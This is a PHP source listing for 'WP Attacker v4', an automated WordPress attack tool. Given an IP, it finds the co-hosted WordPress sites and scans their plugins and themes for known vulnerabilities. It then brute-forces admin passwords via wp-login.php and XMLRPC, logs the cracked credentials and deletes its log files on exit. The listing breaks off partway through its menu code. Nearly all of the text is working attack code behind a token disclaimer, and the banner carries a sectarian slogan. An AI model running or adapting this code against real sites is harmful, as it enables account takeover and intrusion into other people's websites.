[TOOL] WP Attacker v4 © Group XP 2014

1. <?php
2. /*
3.    
4.    
5.               ██████╗ ██████╗  ██████╗ ██╗   ██╗██████╗     ██╗  ██╗██████╗
6.              ██╔════╝ ██╔══██╗██╔═══██╗██║   ██║██╔══██╗    ╚██╗██╔╝██╔══██╗
7.              ██║  ███╗██████╔╝██║   ██║██║   ██║██████╔╝     ╚███╔╝ ██████╔╝
8.              ██║   ██║██╔══██╗██║   ██║██║   ██║██╔═══╝      ██╔██╗ ██╔═══╝
9.              ╚██████╔╝██║  ██║╚██████╔╝╚██████╔╝██║         ██╔╝ ██╗██║    
10.               ╚═════╝ ╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝         ╚═╝  ╚═╝╚═╝ ALM3REFH.COM
11.    
12.    
13.     ██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗
14.     ██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
15.     ██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝
16.     ██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗
17.     ╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║
18.      ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ FORTH VERSION
19.    
20.     WP Attacker v4 © Group XP 2014
21.    
22.     Coder : Hannibal Ksa (@r00t3rz)
23.     Home  : alm3refh.com, sec4ever.com
24.    
25.    
26.     What's WP Attacker:
27.     - Scan the server's websites, and filter the ones that are using WorePress (Using Bing search engin [API]).
28.     - Get All the possible plugins and themese, which are vulnerable (Using a list). *UPDATED*
29.     - BruteForce each website that uses Wordpress (Using a correct username and a passwords list).
30.     - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW*
31.     - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
32.     - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND*
33.    
34.     Why WP Attacker?
35.     - Using Bing API, Which leads to faster & guaranteed responde.
36.     - User can use his own 0day exploits.
37.     - BruteForce with two methods/ways.
38.     - List can be updated by the user.
39.     - Fast, simple and easy.
40.    
41.     # In a simple word, it is an "Automatic WP Exploiter".
42.    
43.     Disclaimer:
44.     - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
45.     - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
46.     - USE IT UNDER YOUR OWN RISK!
47.     - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
48.    
49.     Thanks and enjoy.
50.    
51.     And stay tuned!
52.     Best regards, Ali (aka Hannibal Ksa).
53.    
54. */
55. error_reporting(0);
56. function clear(){
57.     ##########################
58.    ##   CLEAN THE SCREEN   ##
59.    ####################################################
60.    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
61.    ####################################################
62.    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll'
63.        @system('cls'); # Windows
64.    } else { # DIRECTORY_SEPARATOR == '\\'
65.        @system('clear'); # Linux/UNIX/OS X
66.    }
67. }
68. function banner(){
69.     ##########################################################
70.    ##    BANNERS/COPYRIGHTS  R00T3RZ.COM & ALM3REFH.COM    ##
71.    ##   REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!"   ##
72.    ##########################################################
73.    ####################
74.    ##  FIRST BANNER  ##
75.    ####################
76.    $bannerone = "\n\t  _      _____    ___ _______________  _______ _________";
77.     $bannerone .="\n\t | | /| / / _ \  / _ /_  __/_  __/ _ |/ ___/ //_/ __/ _ \\";
78.     $bannerone .="\n\t | |/ |/ / ___/ / __ |/ /   / / / __ / /__/ ,< / _// , _/";
79.     $bannerone .="\n\t |__/|__/_/    /_/ |_/_/   /_/ /_/ |_\___/_/|_/___/_/|_| \n";
80.     $bannerone .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
81.     #####################
82.    ##  SECOND BANNER  ##
83.    #####################
84.    $bannertwo = "\n\t           (                                              ";
85.     $bannertwo .="\n\t (  (      )\ )     (        )   )            )           ";
86.     $bannertwo .="\n\t )\))(   '(()/(     )\    ( /(( /(   )     ( /(   (  (    ";
87.     $bannertwo .="\n\t((_)()\ )  /(_)) ((((_)(  )\())\()| /(  (  )\()) ))\ )(   ";
88.     $bannertwo .="\n\t_(())\_)()(_))    )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\  ";
89.     $bannertwo .="\n\t\ \((_)/ /| _ \   (_)_\(_) |_| |_((_)_ ((_) |(_|_))  ((_) ";
90.     $bannertwo .="\n\t \ \/\/ / |  _/    / _ \ |  _|  _/ _` / _|| / // -_)| '_| ";
91.     $bannertwo .="\n\t  \_/\_/  |_|     /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_|   \n";
92.     $bannertwo .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
93.     ####################
94.    ##  THIRD BANNER  ##
95.    ####################
96.    $bannerthr = "\n\t _ _ _ _____    _____ _   _           _           ";
97.     $bannerthr .="\n\t| | | |  _  |  |  _  | |_| |_ ___ ___| |_ ___ ___ ";
98.     $bannerthr .="\n\t| | | |   __|  |     |  _|  _| .'|  _| '_| -_|  _|";
99.     $bannerthr .="\n\t|_____|__|     |__|__|_| |_| |__,|___|_,_|___|_|  \n";
100.     $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
101.     #####################
102.    ##  FOURTH BANNER  ##
103.    #####################
104.    $bannerfor = "\n\t _    _______    ___  _   _             _             ";
105.     $bannerfor .="\n\t| |  | | ___ \  / _ \| | | |           | |            ";
106.     $bannerfor .="\n\t| |  | | |_/ / / /_\ \ |_| |_ __ _  ___| | _____ _ __ ";
107.     $bannerfor .="\n\t| |/\| |  __/  |  _  | __| __/ _` |/ __| |/ / _ \ '__|";
108.     $bannerfor .="\n\t\  /\  / |     | | | | |_| || (_| | (__|   <  __/ |   ";
109.     $bannerfor .="\n\t \/  \/\_|     \_| |_/\__|\__\__,_|\___|_|\_\___|_|   \n";
110.     $bannerfor .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
111.     ####################
112.    ##  FIFTH BANNER  ##
113.    ####################
114.    $bannerfiv = "\n\t██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ";
115.     $bannerfiv .="\n\t██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗";
116.     $bannerfiv .="\n\t██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝";
117.     $bannerfiv .="\n\t██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗";
118.     $bannerfiv .="\n\t╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║";
119.     $bannerfiv .="\n\t ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝\n\n";
120.     $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
121.     #########################################
122.    ##   GET A RANDOME BANNER & PRINT IT   ##
123.    ##         METASPLOIT SWAG :-P         ##
124.    #########################################
125.    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
126.     print $banner[array_rand($banner)];
127. }
128. function noblackhat(){
129.     ##################
130.    ##  DISCLAIMER  ##
131.    ##################
132.    print "\n\t ______________________________________________";
133.     print "\n\t|    ____                        __  ______    |";
134.     print "\n\t|   / ___|_ __ ___  _   _ _ __   \ \/ /  _ \   |";
135.     print "\n\t|  | |  _| '__/ _ \| | | | '_ \   \  /| |_) |  |";
136.     print "\n\t|  | |_| | | | (_) | |_| | |_) |  /  \|  __/   |";
137.     print "\n\t|   \____|_|  \___/ \__,_| .__/  /_/\_\_|      |";
138.     print "\n\t|                        |_|ALM3REFH.com       |";
139.     print "\n\t|                                              |";
140.     print "\n\t+----------------------------------------------+";
141.     print "\n\t|       WP Attacker v4 - By Hannibal Ksa       |";
142.     print "\n\t+----------------------------------------------+\n\n";
143.     print "\n\t\t    !! NO SHIA / ONLY SUNNAH !!\n\n";
144.     ###########################
145.    ##  5 SECONDS DISCLAIMER ##
146.    ###########################
147.    print "\n\n\tThis tool may be used for legal purposes only.  Users take full
148. \tresponsibility for any actions performed using this tool.            
149. \tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY!                            
150. \tIf these terms are not acceptable to you, then do not use this tool.
151. \n\tPlease Read! Continuing in 5 seconds ";
152.     sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
153.     print "\n\n\n\n";
154. }
155. function bing_it($hk){
156.     ##################
157.    ##   BING API   ##
158.    ###########################################################################
159.    ##   REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ]   ##
160.    ##  MORE INFO [ https://datamarket.azure.com/dataset/bing/search ]       ##
161.    ###########################################################################
162.    $account_key = 'ACCOUNT_KEY_GOES_HERE';
163.     $query = $hk;
164.     $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
165.     $ch = curl_init();
166.     curl_setopt($ch, CURLOPT_URL, $url);
167.     curl_setopt($ch, CURLOPT_HEADER, false);
168.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
169.     curl_setopt($ch, CURLOPT_FRESH_CONNECT,true);
170.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
171.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
172.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
173.     curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
174.     $json = curl_exec($ch);
175.     curl_close($ch);
176.     $data = json_decode($json);
177.     foreach ($data->d->results as $value) {
178.         $file = fopen("sites.txt","a+");
179.         fwrite($file,"{$value->DisplayUrl}\n");
180.         fclose($file);
181.     }
182. }
183. function wp($list){
184.     ########################################
185.    ##   CHECK IF IS BUILT ON WORDPRESS   ##
186.    ########################################
187.    $file = file_get_contents($list);
188.     $get = explode('\n', $file);
189.     foreach($get as $site){
190.         $ch = curl_init();
191.         curl_setopt($ch, CURLOPT_URL, $site);
192.         curl_setopt($ch, CURLOPT_HEADER, 0);
193.         curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
194.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
195.         $result = curl_exec($ch);
196.         curl_exec($ch);
197.         curl_close($ch);
198.         if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
199.             $filename = 'wp-sites.txt';
200.             $fp = fopen($filename, "a+");
201.             $write = fputs($fp, $site."\n");
202.             fclose($fp);
203.         }
204.     }
205.     $lines = file('wp-sites.txt');
206.     $lines = array_unique($lines);
207.     file_put_contents('wp-sites.txt', implode($lines));
208. }
209. function wp_em($list){
210.     ###############################
211.    ##   MAKE'EM CRYSTAL CLEAR   ##
212.    ###############################
213.    $file = file_get_contents($list);
214.     $get = explode("\n", $file);
215.     foreach($get as $wpsite){
216.         $ch = curl_init();
217.         curl_setopt($ch, CURLOPT_URL, $wpsite);
218.         curl_setopt($ch, CURLOPT_HEADER, 0);
219.         curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
220.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
221.         $result = curl_exec($ch);
222.         curl_exec($ch);
223.         curl_close($ch);
224.         preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url);
225.         $wpurl = str_replace("xmlrpc.php","",$url[1]);
226.         $filename = 'wp.txt';
227.         $fp = fopen($filename, "a+");
228.         $write = fputs($fp, $wpurl."\n");
229.         fclose($fp);
230.     }
231.     $lines = file('wp.txt');
232.     $lines = array_unique($lines);
233.     file_put_contents('wp.txt', implode($lines));
234. }
235. function xp_scanner($target, $list, $key = NULL){
236.     ##########################################################
237.    ##   PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION  ##
238.    ##########################################################
239.    ##  LIST FORMAT:  NAME:PATH:KEYWORD                     ##
240.    ##  EXAMPLE:  xp:wp-content/plugins/xp/xp.php:Group-XP  ##
241.    ##########################################################
242.    ##  NAME IS REQUIRED (*)                                ##
243.    ##  PATH IS REQUIRED (*)                                ##
244.    ##  KEYWORD IS OPTIONAL (?)                             ##
245.    ##########################################################
246.    $file = file_get_contents($list);
247.     $plugins = explode("\n", $file);
248.     #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
249.    if($key == NULL){
250.         foreach($plugins as $plugin){
251.             #####################
252.            ##   GET HEADERS   ##
253.            #####################
254.            $x = explode(":", $plugin);
255.             $target = $target.'/'.$x[1];
256.             $check = @get_headers($target);
257.             if(eregi("200",$check[0])){
258.                 ####################
259.                ##  PLUGIN FOUND  ##
260.                ####################
261.                print "\n\t[!] FOUND $x[0] -> $target";
262.                 /*
263.                 #############
264.                 ## SAVE IT ##
265.                 #############
266.                 $data = $target." -> ".$x[0]."\n";
267.                 $filename = 'vuln.txt';
268.                 $fp = fopen($filename, "a+");
269.                 $write = fputs($fp, $data);
270.                 fclose($fp);
271.                 */
272.             }#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
273.        }
274.     }else{
275.         foreach($plugins as $plugin){
276.             #####################
277.            ##   GET KEYWORD   ##
278.            #####################
279.            $x = explode(":", $plugin);
280.             $ch = curl_init();
281.             curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
282.             curl_setopt($ch, CURLOPT_HEADER, 0);
283.             curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
284.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
285.             $result = curl_exec($ch);
286.             curl_exec($ch);
287.             curl_close($ch);
288.             if(preg_match("#".$x[2]."#", $result)){
289.                 ####################
290.                ##  PLUGIN FOUND  ##
291.                ####################
292.                print "\n\t[!] FOUND $x[0] -> $target";
293.                 /*
294.                 #############
295.                 ## SAVE IT ##
296.                 #############
297.                 $data = $target." -> ".$x[0]."\n";
298.                 $filename = 'vuln.txt';
299.                 $fp = fopen($filename, "a+");
300.                 $write = fputs($fp, $data);
301.                 fclose($fp);
302.                 */
303.             } #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
304.        }
305.     }
306. }
307. function xp_get_plugins($target){
308.     #########################
309.    ##   GET ALL PLUGINS   ##
310.    #########################
311.    $ch = curl_init();
312.     curl_setopt($ch, CURLOPT_URL, $target);
313.     curl_setopt($ch, CURLOPT_HEADER, 0);
314.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
315.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
316.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
317.     $result = curl_exec($ch);
318.     curl_exec($ch);
319.     curl_close($ch);
320.     preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
321.     $plugins = array_unique($plugin[1]);
322.     #if(count($plugins)==0){
323.    #    print "No Plugin was found.";
324.    #}
325.    foreach($plugins as $found){
326.         #print "\n\n$found\n\n";
327.        #################
328.        ##  SEARCH IT  ##
329.        #################
330.        xp_scanner_db($target, $found);
331.     }
332. }
333. function xp_get_themes($target){
334.     #########################
335.    ##   GET ALL PLUGINS   ##
336.    #########################
337.    $ch = curl_init();
338.     curl_setopt($ch, CURLOPT_URL, $target);
339.     curl_setopt($ch, CURLOPT_HEADER, 0);
340.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
341.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
342.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
343.     $result = curl_exec($ch);
344.     curl_exec($ch);
345.     curl_close($ch);
346.     preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
347.     $themes = array_unique($theme[1]);
348.     #if(count($plugins)==0){
349.    #    print "No Plugin was found.";
350.    #}
351.    foreach($themes as $found){
352.         #print "\n\n$found\n\n";
353.        #################
354.        ##  SEARCH IT  ##
355.        #################
356.        xp_scanner_db($target, $found);
357.     }
358. }
359. function xp_scanner_db($target, $plugin){
360.     #######################################################################
361.    ##   PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION  ##
362.    #######################################################################
363.    ##  THIS VERSION ONLY CHECKS  ##
364.    ## - WORDPRESSEXPLOIT.COM     ##
365.    ## - EXPLOIT-DB.COM           ##
366.    ################################
367.    $wpexploit = array("http://www.wordpressexploit.com/", );
368.     $ch = curl_init();
369.     curl_setopt($ch, CURLOPT_URL, $wpexploit);
370.     curl_setopt($ch, CURLOPT_HEADER, 0);
371.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
372.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
373.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
374.     $result = curl_exec($ch);
375.     curl_exec($ch);
376.     curl_close($ch);
377.     if(preg_match("#$plugin#", $result)){
378.         ##############
379.        ##  GOTCHA  ##
380.        ##############
381.        //print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
382.         ###############
383.        ##  SAVE IT  ##
384.        ###############
385.        $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
386.         $filename = 'vulpl.txt';
387.         $fp = fopen($filename, "a+");
388.         $write = fputs($fp, $data."\n");
389.         fclose($fp);
390.     }
391. }
392. function xp_get_user($target,$list, $xmlrpc = NULL){
393.     ####################################
394.    ##     GET WORDPRESS USERNAME     ##
395.    ##  A SIMPLE ONE BUT WOTH A SHOT  ##
396.    ####################################
397.    $user = trim(($target))."/?author=1";
398.     $ch = curl_init();
399.     curl_setopt($ch, CURLOPT_URL, $user);
400.     curl_setopt($ch, CURLOPT_HEADER, 0);
401.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
402.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
403.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
404.     $result = curl_exec($ch);
405.     curl_exec($ch);
406.     curl_close($ch);
407.     preg_match('#<title>(.*?)</title>#', $result, $username);
408.     $account = explode('|', $username[1]);
409.     if($xmlrpc == NULL){
410.         ###########################################################
411.        ##  START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
412.        ###########################################################
413.        return xp_brute($target,$account[0],$list);
414.     }else {
415.         ###########################################################
416.        ##  START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT  ##
417.        ###########################################################
418.        return xp_brute_xmlrpc($target,$account[0],$list);
419.     }
420. }
421. function xp_brute($target,$user,$list){
422.     ###########################################
423.    ##   BRUTE FORCE PULBLIC/FIRST VERSION   ##
424.    ###########################################
425.    ##  PASSWORDS LIST FORMAT:  PASSWORD\n   ##
426.    ##  EXAMPLE:  12345\np4ssw0rd            ##
427.    ##  ( \n = NEW LINE )                    ##
428.    ###########################################
429.    $file = file_get_contents($list);
430.     $passwords = explode("\n", $file);
431.     $target = trim($target);
432.     $user = trim($user);
433.     print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
434.     foreach($passwords as $password){
435.         #############################
436.        ##  TESTING EACH PASSWORD  ##
437.        #############################
438.        $redirect = $taregt."/wp-admin/";
439.         $curl = curl_init();
440.         curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
441.         curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
442.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
443.         curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
444.         curl_setopt($curl,CURLOPT_TIMEOUT,10);
445.         curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
446.         curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
447.         curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
448.         $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
449.         curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
450.         $result = curl_exec($curl);
451.         curl_close($curl);
452.         ##########################
453.        ##  CHECK IF IT WORKED  ##
454.        ##########################
455.        if(strstr($result, 'tab-panel-overview')){
456.             print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
457.             ###############
458.            ##  SAVE IT  ##
459.            ###############
460.            $data = "\n[!] Cracked $target -> [ $user:$password ]";
461.             $filename = 'cracked.txt';
462.             $fp = fopen($filename, "a+");
463.             $write = fputs($fp, $data."\n");
464.             fclose($fp);
465.             break;
466.         }#else{ print "\n[+] Trying $user:$password"; }
467.    }
468. }
469. function xp_check_xmlrpc($target){
470.     $target = $target."/xmlrpc.php";
471.     $check = @get_headers($target);
472.     if(eregi("200",$check[0])){
473.         return 1;
474.     }else{
475.         return 0;
476.     }
477. }
478. function xp_brute_xmlrpc($target,$user,$list){
479.     ######################################################
480.    ##   BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION   ##
481.    ######################################################
482.    ##  PASSWORDS LIST FORMAT:  PASSWORD\n              ##
483.    ##  EXAMPLE:  12345\np4ssw0rd                       ##
484.    ##  ( \n = NEW LINE )                               ##
485.    ######################################################
486.    $target = trim($target);
487.     $user = trim($user);
488.     if(xp_check_xmlrpc($target) != 1){
489.         print "\n[!] Couldn't find xmlrpc.php in $target\n";
490.         break;
491.     }else{
492.         $file = file_get_contents($list);
493.         $passwords = explode("\n", $file);
494.         print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
495.         foreach($passwords as $password){
496.             $password = trim($password);
497.             $headers = array('Content-Type: application/x-www-form-urlencoded');
498.             $isadmin = '<name>isAdmin</name>';
499.             #############################
500.            ##  TESTING EACH PASSWORD  ##
501.            #############################
502.            $data = "
503.            <methodCall>
504.                <methodName>wp.getUsersBlogs</methodName>
505.                <params>
506.                <param><value><string>$user</string></value></param>
507.                <param><value><string>$password</string></value></param>
508.            </params></methodCall>
509.            ";
510.             $curl = curl_init();
511.             curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
512.             curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
513.             curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
514.             curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
515.             curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
516.             curl_setopt($curl,CURLOPT_TIMEOUT,10);
517.             curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
518.             curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
519.             curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
520.             curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
521.             $result = curl_exec($curl);
522.             curl_close($curl);
523.             ##########################
524.            ##  CHECK IF IT WORKED  ##
525.            ##########################
526.            if(strstr($result, $isadmin)){
527.                 print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
528.                 ###############
529.                ##  SAVE IT  ##
530.                ###############
531.                $data = "\n[!] Cracked $target -> [ $user:$password ]";
532.                 $filename = 'cracked.txt';
533.                 $fp = fopen($filename, "a+");
534.                 $write = fputs($fp, $data."\n");
535.                 fclose($fp);
536.                 break;
537.             }#else{ print "\n[+] Trying $user:$password"; }
538.        }
539.     }
540. }
541. function bye(){
542.     ########################
543.    ##  DONE/SAY GOODBYE  ##
544.    ########################
545.    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
546.     ######################
547.    ## DELETE LOG FILES ##
548.    ###################################################################
549.    ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
550.    ###################################################################
551.    unlink('sites.txt');
552.     unlink('wp-sites.txt');
553.     unlink('wp.txt');
554.     unlink('vuln.txt');
555.     unlink('cracked.txt');
556.     exit(2);
557. }
558. ############################
559. ##  COMMAND LINE'S  SHIT  ##
560. ############################
561. clear();
562. noblackhat();
563. ################################################
564. ##  MAKE SURE IT RUNS ONLY FROM COMMAND LINE  ##
565. ################################################
566. if( strtolower(php_sapi_name()) != 'cli' ) {
567.     printf("%s\n", "Please run only from command line interface.");
568.     exit;
569. }
570. clear();
571. banner();
572. print "\nIP-Address # ";
573. $target = trim(fgets(STDIN));
574. // if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
575. ##############################
576. ##   DELETE OLD LOG FILES   ##
577. ##############################
578. unlink('sites.txt');
579. unlink('wp-sites.txt');
580. unlink('wp.txt');
581. unlink('vuln.txt');
582. unlink('cracked.txt');
583. unlink('vulpl.txt');
584. #############################
585. ##   CREAT THE LOG FILES   ##
586. #############################
587. $log1 = fopen("sites.txt","w");fclose($log1);
588. $log2 = fopen("wp-sites.txt","w");fclose($log2);
589. $log3 = fopen("wp.txt","w");fclose($log3);
590. $log4 = fopen("vuln.txt","w");fclose($log4);
591. $log4 = fopen("cracked.txt","w");fclose($log4);
592. $log5 = fopen("vulpl.txt","w");fclose($log5);
593. ###############################
594. ##  SHIT IS GETTIN' REAL =P  ##
595. ###############################
596. print "\nDORK [or simply leave it empty] # ";
597. $dork = trim(fgets(STDIN));
598. print "\n[+] Getting the server's sites";
599. if($dork == ""){
600.     #########################
601.    ##  IF DORK WAS EMPTY  ##
602.    #########################
603.    bing_it("ip:$target");
604.     bing_it("ip:".$target." /page_id=");
605.     bing_it("ip:".$target." Wordpress");
606.     bing_it("ip:".$target." blog");
607. }else{
608.     ###########################
609.    ##  USE THE USER'S DORK  ##
610.    ###########################
611.    bing_it("ip:".$target." ".$dork);
612. }
613. #print "\n[-] Got'em";sleep(1);
614. print "\n[+] Separating the sites";
615. wp('sites.txt');
616. #print "\n[-] We got the sites, which are using WordPress";sleep(1);
617. wp_em('wp-sites.txt');
618. #################
619. ##   Results   ##
620. #################
621. print "\n[+] Finished, these are the website/s that I found:\n";
622. $wplist = file_get_contents('wp.txt');
623. $get = explode("\n", $wplist);
624. #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
625. foreach($get as $hk){
626.     if(!$hk==""){
627.         print "\n\t[!] $hk";
628.     }
629. }
630. ###########################
631. ##   GIVE ME AN OPTION   ##
632. ###########################
633. print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
634. print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
635. $what = trim(fgets(STDIN));
636. $choice = array("1","2","3","4");
637. $yesno = array("y","yes");
638. if(in_array($what, $choice)){
639.     if($what == "1"){
640.         print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
641.         $list = trim(fgets(STDIN));
642.         if(!is_file($list)) {
643.             #######################
644.            ##  CAN'T LOAD LIST  ##
645.            #######################
646.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
647.             ##############
648.            ##   EXIT   ##
649.            ##############
650.            bye();
651.         }
652.         #################
653.        ##   POOYAA!   ##
654.        #################
655.        print "\n[+] Scanning begun";
656.         $file = file_get_contents($list);
657.         $plugins = explode("\n", $file);
658.         print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
659.         $targets = file_get_contents('wp.txt');
660.         $r00t3rz = explode("\n", $targets);
661.         print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
662.         $key = strtolower(trim(fgets(STDIN)));
663.         if(in_array($key, $yesno)){
664.             $key = "set";
665.         }else{
666.             $key = NULL;
667.         }
668.         foreach($r00t3rz as $z){
669.             if(!$z == ""){
670.                 xp_scanner($z, $list, $key);
671.             }
672.         }
673.         /*
674.         #################
675.         ##   Results   ##
676.         #################
677.         print "\n[+] Scanning finished!";
678.         $vul = file_get_contents('vuln.txt');
679.         $able = explode("\n", $vul);
680.         print '[ '.count($able).' Website ]\n';
681.         foreach($able as $gxp){
682.             if(!$gxp==""){
683.                 print "\n\t[!] $gxp";
684.             }
685.         }
686.         */
687.         bye();
688.     } elseif($what == "2") {
689.         print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
690.         #################
691.        ##   POOYAA!   ##
692.        #################
